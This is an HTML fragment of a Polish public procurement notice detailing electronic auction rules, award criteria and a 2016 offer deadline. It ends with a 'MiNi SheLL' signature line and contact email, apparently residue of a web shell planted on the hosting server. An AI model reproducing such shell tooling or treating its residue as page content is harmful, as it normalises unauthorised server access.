              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i><br />
                tak
                <br />
                Należy podać adres strony internetowej, na której aukcja będzie prowadzona:
                <br />https://aukcje.uzp.gov.pl/<br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b>Kryterium oceny ofert w aukcji elektronicznej są: cena, termin dostawy zostały określone w Rozdz.
XI SIWZ. Złożone przez Wykonawców oferty pisemne zostaną wprowadzone do systemu przez
Zamawiającego. Jest to oferta wyjściowa (dot. ceny), która może zostać poprawiona przez każdego
Wykonawcę poprzez składanie kolejnych ofert (postąpień dot. tylko kryterium ceny).<br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                tak
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              1. Aukcja zostanie przeprowadzona jeżeli, po dokonaniu
przez Zamawiającego badania złożonych ofert, co najmniej 2 oferty nie będą podlegały odrzuceniu.
2. Zaproszenie do udziału w aukcji zostanie wysłane drogą elektroniczną do wszystkich
Wykonawców, którzy złożyli oferty niepodlegające odrzuceniu na adres e-mail wskazany w
formularzu ofertowym. Zaproszenie zostanie wysłane z platformy aukcji elektronicznej, za
czynność przesłania odpowiada Urząd Zamówień Publicznych. 3. Aukcja zostanie przeprowadzona
na platformie aukcji elektronicznych Urzędu Zamówień Publicznych pod adresem:
https://aukcje.uzp.gov.pl/ 4. W formularzu ofertowym należy wskazać osobę uprawnioną do
składania ofert w imieniu Wykonawcy podczas aukcji elektronicznej. 5. W przypadku gdy podczas
aukcji oferty będzie składała inna osoba niż osoba składająca ofertę, do oferty należy dołączyć
pełnomocnictwo z którego będzie wynikać prawo do reprezentowania Wykonawcy w aukcji
elektronicznej. 6. Zmiany osoby, która będzie składała oferty (postąpienia) podczas aukcji
elektronicznej można dokonać najpóźniej na jeden dzień przed otwarciem aukcji. 7. Oferty podczas
aukcji Wykonawca składa za pomocą formularza umieszczonego na stronie internetowej,
umożliwiającego wprowadzanie niezbędnych danych w trybie bezpośredniego połączenia z tą
stroną, opatrzone bezpiecznym podpisem elektronicznym weryfikowanym za pomocą ważnego
kwalifikowanego certyfikatu pod rygorem nieważności. Uwaga: Podpisem spełniającym wymogi
ustawowe będzie podpis wydawany przez kwalifikowany podmiot certyfikujący  wpisany do
rejestry prowadzonego przez Narodowe Centrum Certyfikacji. 8. W przypadku, gdy Wykonawca
będzie posługiwał się podpisem elektronicznym wystawionym przez zagraniczny podmiot
certyfikacyjny, Wykonawca zobowiązany jest dostarczyć Zamawiającemu wzór takiego podpisu,
który Zamawiający przekaże do administratora systemu najpóźniej na dwa tygodnie przed
otwarciem aukcji. 9. Zamawiający zarejestruje Wykonawców zaproszonych do udziału w aukcji
elektronicznej i prześle na adres e-mail wskazany przez Wykonawcę zaproszenie wraz z hasłem i
loginem. Konto Wykonawcy umożliwia mu wzięcie udziału tylko w jednej aukcji. Zamawiający nie
zna haseł poszczególnych Wykonawców. LOGIN i HASŁO Wykonawcy są generowane
automatycznie przez system, a następnie przesyłane wraz z zaproszeniem do aukcji. UWAGA:
zagubienie loginu uniemożliwi Wykonawcy korzystanie z założonego konta. Zagubienie lub
zapomnienie hasła nie powoduje utraty możliwości korzystania z konta użytkownika, gdyż system
przewiduje możliwość wygenerowania nowego hasła. 10. Po otrzymaniu zaproszenia Wykonawca
zobowiązany jest do zalogowania się na platformie aukcyjnej za pomocą otrzymanego w
zaproszeniu loginu i hasła oraz potwierdzenia poprawności danych wprowadzonych przez
Zamawiającego za pomocą polecenia wyślij wiadomość do zamawiającego. UWAGA: Należy
zwrócić szczególną uwagę na poprawne zdefiniowanie przez Zamawiającego osoby uprawnionej do
składania postąpień. 11. Od momentu otwarcia aukcji elektronicznej do momentu jej zamknięcia
każdy Wykonawca może złożyć dowolną liczbę postąpień. Składane kolejne oferty Wykonawcy
podlegają automatycznej ocenie i klasyfikacji zgodnie ze wzorem wskazanym w zaproszeniu oraz
określonym w rozdziale XI SIWZ 12. Kryterium oceny ofert w aukcji elektronicznej są: cena,
termin dostawy zostały określone w Rozdz. XI SIWZ. Złożone przez Wykonawców oferty pisemne
zostaną wprowadzone do systemu przez Zamawiającego. Jest to oferta wyjściowa (dot. ceny), która
może zostać poprawiona przez każdego Wykonawcę poprzez składanie kolejnych ofert (postąpień
dot. tylko kryterium ceny). 13. Termin otwarcia aukcji zostanie podany w zaproszeniach do udziału
w aukcji. 14. Aukcja będzie prowadzona zgodnie z czasem wskazanym na platformie. 15. Aukcja
jest jednoetapowa, zostanie zamknięta jeżeli w jej trakcie przez 20 minut nie zostanie złożone żadne
nowe postąpienie. Bieg terminu rozpocznie się wraz z otwarciem aukcji. UWAGA: W trakcie
złożenia postąpienia istnieje rozbieżność czasowa pomiędzy złożeniem postąpienia a weryfikacją
podpisu elektronicznego (ok. 30 s). Sytuacja ta może mieć wpływ przy składaniu postąpienia w
ostatniej minucie na jego złożenie. Może zdarzyć się, że portal nie zdąży zweryfikować podpisu i
postąpienie zostanie odrzucone przez system. 16. W sytuacji, gdy w chwili zamknięcia aukcji dwie
oferty uzyskają jednakową liczbę punktów, Zamawiający przewiduje możliwość przedłużenia
aukcji, w celu przeprowadzenia dogrywki. 17. W toku dogrywki wykonawcy mają możliwość
złożenia po jednym postąpieniu, czas trwania dogrywki będzie wynosił 10 minut. 18. Sposób
składania ofert (postąpień) w toku aukcji elektronicznej: 18.1 W toku aukcji elektronicznej
wykonawcy składają oferty elektroniczne, pozostając w trybie bezpośredniego połączenia ze stroną
internetową https://aukcje.uzp.gov.pl. 18.2 Składanie ofert jest możliwe wyłącznie po zalogowaniu
się w systemie. 18.3 Składanie ofert odbywa się z poziomu zakładki: Moje aukcje, w widoku oferta
18.4 W celu wprowadzenia postąpienia należy nacisnąć polecenie złóż postąpienie znajdujące się
obok danego kryterium, a następnie wprowadzić oferowaną cenę i nacisnąć zmień. 18.5 System
wskazuje przewidywaną punktację, jaką uzyska oferta po wprowadzonych zmianach. Czynność
wprowadzania zmian w ofercie można ponawiać aż do uzyskania odpowiedniej punktacji. 18.6
Wprowadzone zmiany należy zaakceptować za pomocą polecenia zapisz. 18.7 Należy pobrać i
zapisać na dysku dokument opisujący postąpienie (dokument w formacie PDF), a następnie
nacisnąć polecenie Dalej. 18.8 Poza systemem aukcyjnym należy pobrany dokument opisujący
postąpienie podpisać - z wykorzystaniem oprogramowania służącego do składania podpisu
(oprogramowanie dostarczane przez wystawcę podpisu elektronicznego) - podpis w formacie
XADES lub SIG 18.9 W systemie aukcyjnym należy nacisnąć polecenie wybierz plik, a następnie
wskazać plik podpisu postąpienia (plik w formacie XADES lub SIG) i nacisnąć przycisk wyślij 19.
Minimalne wymagania techniczne urządzeń informatycznych, niezbędne do przeprowadzenia
aukcji elektronicznej: 19.1 komputer klasy PC z systemem operacyjnym Windows lub Linux oraz
dostępem do sieci Internetowej 19.2 zalecane przez administratora platformy są przeglądarki:
Mozilla Firefox w wersji 2.0 lub wyższej lub Opera w wersji 9.0 lub wyższej lub Gogle Chrome w
wersji 3.0 lub wyższej (Administrator platformy nie zaleca korzystania z przeglądarki Internet
Explorer ze względu na brak kompatybilności ze standardami systemu aukcyjnego oraz problemami
bezpieczeństwa) 19.3 program do odczytu plików w formacie PDF 19.4 ważny kwalifikowany
certyfikat podpisu elektronicznego oraz oprogramowanie służące do składania podpisu
elektronicznego 19.5 Wykonawcy składający postąpienia są obowiązani podpisywać oferty w toku
aukcji elektronicznej za pomocą oprogramowania dostarczanego przez wystawcę podpisu
elektronicznego. Nie jest możliwe podpisywanie ofert przy użyciu funkcji podpisu dostępnej w
programie Adobe Reader 19.6 Oferty winny być opatrzone bezpiecznym podpisem elektronicznym
w formacie XADES albo SIG, gdyż tylko dokumenty opatrzone podpisem w ww. formatach są
akceptowane przez system aukcyjny. Dopuszczalny jest zarówno podpis wewnętrzny, jak i
zewnętrzny. Celem uniknięcia ewentualnych problemów w toku aukcji Wykonawcy winni
wprowadzić odpowiednie ustawienia do oprogramowania obsługującego składanie podpisu
elektronicznego przed rozpoczęciem aukcji. W trudności z właściwym skonfigurowaniem
oprogramowania (w szczególności ustawieniu formatu podpisu na XADES albo SIG) zalecany jest
kontakt z wystawcą podpisu elektronicznego. 19.7 Wszelkie operacje związane z przyjmowaniem i
weryfikacją postąpień opatrzonych bezpiecznym podpisem elektronicznym są wykonywane
bezpośrednio przez program aukcyjny. 20. Wykonawca, który zwycięży w aukcji elektronicznej jest
zobligowany do dostarczenia w wyznaczonym czasie nowego formularza ofertowego wypełnionego
zgodnie z Rozdziałem X SIWZ w oparciu o kwotę uzyskaną podczas aukcji. 21. Wykonawca w
trakcie wypełniania formularza ofertowego zobowiązany jest do prawidłowego przeliczenia ceny,
przy czym kwota nie może przekroczyć ceny, wylicytowanej w trakcie aukcji elektronicznej. 22.
Zamawiający ustala wysokość minimalnego postąpienia w aukcji elektronicznej na kwotę 500,00 zł
23. W przypadku gdy awaria systemu teleinformatycznego spowoduje przerwanie aukcji
elektronicznej, zamawiający wyznacza termin kontynuowania aukcji elektronicznej na następny po
usunięciu awarii dzień roboczy, z uwzględnieniem stanu ofert po ostatnim zatwierdzonym
postąpieniu.<br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja jednoetapowa
                  <br />Czas trwania: 20<br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br />Aukcja jest jednoetapowa, zostanie zamknięta jeżeli w jej trakcie przez 20 minut nie zostanie
złożone żadne nowe postąpienie. Bieg terminu rozpocznie się wraz z otwarciem aukcji.</div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>90.00</td></tr><tr><td>Termin dostawy</td><td>10.00</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                nie
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />1. Postanowienia dotyczące realizacji zamówienia są zawarte w załączniku nr 2 do SIWZ  projekt
umowy. 2. Jednocześnie w myśl art. 144 ust. 1 ustawy Pzp Zamawiający dopuszcza możliwość
zmian postanowień umowy w zakresie: a) Zmiana obowiązującej stawki VAT z zachowaniem
kwoty brutto wynikającej z realizacji umowy<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 05/10/2016, godzina: 10:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              <br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com